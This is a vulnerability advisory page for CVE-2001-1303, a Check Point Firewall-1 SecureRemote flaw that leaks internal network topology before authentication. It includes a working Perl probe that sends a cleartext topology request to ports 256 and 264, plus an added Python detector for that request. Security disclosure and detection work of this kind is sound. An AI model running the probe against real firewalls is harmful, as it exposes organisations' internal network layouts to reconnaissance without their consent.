Check Point Firewall-1 SecureRemote Network Information Disclosure Vulnerability

Vulnerability ID: 1106434    Vulnerability type: Configuration error
Published: 2001-07-17    Updated: 2005-05-02
CVE ID: CVE-2001-1303
CNNVD-ID: CNNVD-200107-113
Platform: Hardware    CVSS score: 5.0
|Source
https://www.exploit-db.com/exploits/21015
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-113
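|Vulnerability details
SecureRemote is a proprietary VPN component designed by Check Point Software and included with some versions of Firewall-1. The package has a security problem that allows remote attackers to gather information about internal networks. In some older versions it even sends the internal network topology information to the connecting party before authentication has completed, which may give an attacker an opportunity to learn more about the target network.
|Exploit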
source: http://www.securityfocus.com/bid/3058/info

SecureRemote is the proprietary VPN infrastructure designed by Check Point Software, and included with some versions of Firewall-1.

A problem with the package allows remote users to gain information about internal networks. Older versions of the package send network topology information to SecureRemote connections prior to authentication, allowing an information gathering attack. 

#!/usr/bin/perl
# A command-line tool that can be used to download network topology
# from Firewall-1's running SecureRemote, with the option
# "Allow unauthenticated cleartext topology downloads".
# Usage: sr.pl IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# [email protected] - http://www.sensepost.com

use Socket;
if ($#ARGV<0) {die "Usage: sr.pl IP\n";}

$port=256;
$target=inet_aton($ARGV[0]);
print "Testing $ARGV[0] on port $port\n";

$SENDY="410000000259052100000004c41e43520000004e28746f706f6c6f67792d726571756573740a093a63616e616d6520282d53656e7365506f73742d646f74
636f6d2d290a093a6368616c6c656e67652028633265323331383339643066290a290a00";
$SENDY = pack("H*",$SENDY);

@results=sendraw($SENDY);

if ($#results == 0) {
 print "No results on port 256 - trying 264\n";
 $port=264;
 @results2=sendraw($SENDY);
 if ($#results2 == 0) {die "Sorry - no results\n";}
} else {print @results;}

sub sendraw {
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in;
  select(S);      $|=1;   print $pstr;
  while(<S>){ push @in, $_;}
  select(STDOUT); close(S); return @in;
 } else { return ""; }
}
# Spidermark: sensepostdata fw1
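
A detection-side sketch, added here and not part of the original advisory or the SensePost script: because the topology request travels in cleartext before authentication, a sensor can spot it in TCP payloads sent to ports 256 and 264 and report who asked. The record tuple layout, the `expected_sources` allowlist and all sample values are assumptions constructed for illustration.

```python
import ipaddress
import re

TOPOLOGY_PORTS = {256, 264}      # ports tried by the script on this page
MARKER = b"(topology-request"    # cleartext body decoded from the page's hex string
# Fields seen in that body; values are length-capped to bound what gets logged.
FIELD_RE = re.compile(rb":(caname|challenge)\s+\(([^)\r\n]{0,128})\)")


def inspect_payload(dst_port, payload):
    """Return a finding dict for a cleartext topology request, else None."""
    if dst_port not in TOPOLOGY_PORTS:
        return None
    start = payload.find(MARKER)   # binary header before the marker is not parsed
    if start < 0:
        return None
    fields = {name.decode(): value.decode("ascii", "replace")
              for name, value in FIELD_RE.findall(payload[start:])}
    return {"dst_port": dst_port,
            "caname": fields.get("caname"),
            "challenge": fields.get("challenge")}


def scan(records, expected_sources=()):
    """records: (src_ip, dst_ip, dst_port, payload) tuples (assumed sensor output).
    expected_sources: networks where legitimate VPN clients live (hypothetical)."""
    nets = [ipaddress.ip_network(n) for n in expected_sources]
    findings = []
    for src, dst, dst_port, payload in records:
        hit = inspect_payload(dst_port, payload)
        if hit is None:
            continue
        hit["src"], hit["dst"] = src, dst
        hit["expected_source"] = any(ipaddress.ip_address(src) in n for n in nets)
        findings.append(hit)
    return findings


# Constructed sample records: documentation addresses, made-up field values.
SAMPLE_HEADER = b"\x00" * 20     # stand-in for the unparsed binary header
SAMPLE_REQUEST = (SAMPLE_HEADER + b"(topology-request\n\t:caname (constructed-client)"
                  b"\n\t:challenge (0123456789ab)\n)\n\x00")
SAMPLE_RECORDS = [
    ("198.51.100.7", "192.0.2.1", 256, SAMPLE_REQUEST),
    ("203.0.113.9", "192.0.2.1", 264, SAMPLE_REQUEST),
    ("198.51.100.7", "192.0.2.1", 443, SAMPLE_REQUEST),
    ("198.51.100.7", "192.0.2.1", 256, b"\x00\x01unrelated"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS, expected_sources=["203.0.113.0/24"]):
        print(finding)
```

Findings with `expected_source` set to `False` are the ones worth triaging, since legitimate SecureRemote clients issue the same request.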
|References

Source: XF
Name: fw1-securemote-gain-information(6857)
Link: http://xforce.iss.net/static/6857.php
Source: BID
Name: 3058
Link: http://www.securityfocus.com/bid/3058
Source: BUGTRAQ
Name: 20010718Firewall-1Informationleak
Link: http://www.securityfocus.com/archive/1/197566
Source: OSVDB
Name: 588
Link: http://www.osvdb.org/588
